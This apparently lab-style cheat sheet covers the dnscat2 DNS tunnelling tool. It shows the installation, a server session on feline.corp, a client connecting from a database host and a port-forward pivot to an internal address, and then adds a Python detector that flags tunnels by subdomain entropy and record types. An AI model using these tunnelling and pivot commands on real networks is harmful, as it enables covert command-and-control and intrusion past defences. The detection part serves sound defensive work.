
【Tunneling】dnscat2


Installation

# server
sudo apt install dnscat2
# client
sudo apt install dnscat2-client

Usage

server - start

# dnscat2-server {domain}
kali@server:~$ dnscat2-server feline.corp
[sudo] password for kali: 7he_C4t_c0ntro11er

New window created: 0
New window created: crypto-debug
Welcome to dnscat2! Some documentation may be out of date.

auto_attach => false
history_size (for new windows) => 1000
Security policy changed: All connections must be encrypted
New window created: dns1
Starting Dnscat2 DNS server on 0.0.0.0:53
[domains = feline.corp]...

Assuming you have an authoritative DNS server, you can run
the client anywhere with the following (--secret is optional):

  ./dnscat --secret=d31d6a9e9d5895f42b823043a70fe3d4 feline.corp

To talk directly to the server without a domain name, run:

  ./dnscat --dns server=x.x.x.x,port=53 --secret=d31d6a9e9d5895f42b823043a70fe3d4

Of course, you have to figure out <server> yourself! Clients
will connect directly on UDP port 53.

dnscat2>

client - connect

# dnscat {domain}
database_admin@client:~/dnscat$ ./dnscat feline.corp
./dnscat feline.corp
Creating DNS driver:
 domain = feline.corp
 host   = 0.0.0.0
 port   = 53
 type   = TXT,CNAME,MX
 server = 127.0.0.53

Encrypted session established! For added security, please verify the server also displays this string:

Gone Nodule Spring Gifts Stirs Foams 

Session established!

server - accept the connection and listen

# windows: list all windows
dnscat2> windows
0 :: main [active]
  crypto-debug :: Debug window for crypto stuff [*]
  dns1 :: DNS Driver running on 0.0.0.0:53 domains = feline.corp [*]
  1 :: command (pgdatabase01) [encrypted, NOT verified] [*]
# -i 1: open an interactive window for session 1 (the first client session)
dnscat2> window -i 1
New window created: 1
history_size (session) => 1000
Session 1 security: ENCRYPTED BUT *NOT* VALIDATED
For added security, please ensure the client displays the same string:

>> Gone Nodule Spring Gifts Stirs Foams
This is a command session!

That means you can enter a dnscat2 command such as
'ping'! For a full list of clients, try 'help'.

# forward local port 4455 through the tunnel to 172.16.201.217:4646
command (pgdatabase01) 1> listen 0.0.0.0:4455 172.16.201.217:4646
Listening on 0.0.0.0:4455, sending connections to 172.16.201.217:4646
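The client banner above shows what this tunnel looks like on the wire: every packet is carried in DNS queries of type TXT, CNAME or MX, sent via the host's stub resolver (127.0.0.53) to the authoritative server for feline.corp, with the payload encoded into long hex-looking subdomain labels. That is also what a defender can key on in resolver logs. The script below is an added example, not part of dnscat2 or the original post: it aggregates queries per (client, zone), computes the Shannon entropy of the subdomain labels and the share of tunnel-typical record types, and flags pairs that exceed thresholds. The log format (`client_ip qtype qname`, one query per line), the sample lines, the function names and the thresholds are all constructed assumptions to tune against your own baseline.

```python
"""Heuristic detector for dnscat2-style DNS tunnelling in resolver logs.

Added example; not dnscat2 code. The log format is a constructed,
simplified one: "<client_ip> <qtype> <qname>", one query per line.
Thresholds are assumptions and need tuning against a real baseline.
"""
import math
from collections import defaultdict

# Record types the dnscat2 client uses by default (TXT,CNAME,MX in its
# banner). Ordinary endpoints rarely send many of these to one zone.
TUNNEL_QTYPES = {"TXT", "CNAME", "MX"}


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0.0 for an empty string)."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname: str, zone_labels: int = 2):
    """Split 'a.b.example.com.' into ('a.b', 'example.com').

    Assumes a two-label registered zone; a public-suffix list would be
    needed for names like example.co.uk."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) <= zone_labels:
        return "", ".".join(labels)
    return ".".join(labels[:-zone_labels]), ".".join(labels[-zone_labels:])


def parse_log(text: str):
    """Yield (client_ip, qtype, qname) tuples from the constructed format."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # skip malformed lines instead of crashing
        yield parts[0], parts[1].upper(), parts[2]


def score_zones(text, min_queries=5, min_entropy=3.5, min_tunnel_ratio=0.5):
    """Aggregate per (client, zone) and return a list of flagged pairs."""
    stats = defaultdict(lambda: {"n": 0, "tunnel": 0, "subs": set(), "sub_len": 0})
    for client, qtype, qname in parse_log(text):
        sub, zone = split_name(qname)
        s = stats[(client, zone)]
        s["n"] += 1
        s["tunnel"] += qtype in TUNNEL_QTYPES
        s["subs"].add(sub)
        s["sub_len"] += len(sub.replace(".", ""))

    flagged = []
    for (client, zone), s in stats.items():
        if s["n"] < min_queries:
            continue
        # Entropy over the concatenated unique subdomains: encoded payloads
        # look like uniformly distributed hex, real hostnames do not.
        joined = "".join(sub.replace(".", "") for sub in s["subs"])
        ent = shannon_entropy(joined)
        ratio = s["tunnel"] / s["n"]
        if ent >= min_entropy and ratio >= min_tunnel_ratio:
            flagged.append({
                "client": client,
                "zone": zone,
                "queries": s["n"],
                "unique_subdomains": len(s["subs"]),
                "avg_subdomain_len": round(s["sub_len"] / s["n"], 1),
                "entropy": round(ent, 2),
                "tunnel_qtype_ratio": round(ratio, 2),
            })
    return flagged


# Constructed sample: normal web/mail lookups plus one host talking to
# feline.corp with hex-encoded labels and tunnel record types.
SAMPLE_LOG = """\
10.0.0.7 A www.example.com.
10.0.0.7 AAAA www.example.com.
10.0.0.7 A cdn.example.com.
10.0.0.7 A mail.example.com.
10.0.0.7 A api.example.com.
10.0.0.9 MX example.org.
10.0.0.9 MX example.net.
10.0.0.42 TXT 0f3a9c2e5b7d1846.c2e90a6f8d4b1375.feline.corp.
10.0.0.42 CNAME 93fa1c2e5b7d0846.4b2e9c6f8d0a1375.feline.corp.
10.0.0.42 MX a6f8d4b137520c9e.7d18460f3a9c2e5b.feline.corp.
10.0.0.42 TXT e5b7d1846f03a9c2.8d4b13752c9e0a6f.feline.corp.
10.0.0.42 TXT 1375c2e90a6f8d4b.5b7d18460f3a9c2e.feline.corp.
10.0.0.42 CNAME 2e5b7d18460f3a9c.6f8d4b13752c9e0a.feline.corp.
"""

if __name__ == "__main__":
    for hit in score_zones(SAMPLE_LOG):
        print(hit)
```

Only the 10.0.0.42 / feline.corp pair is reported: six queries, all TXT/CNAME/MX, 32-character subdomains with maximal hex entropy. The mail relay doing MX lookups and the web client doing A/AAAA lookups stay below the thresholds. Record type alone is a weak signal, since dnscat2 can be told to use other types, so the query volume and label entropy per zone carry most of the weight; a zone on a corporate allow-list should be excluded before alerting.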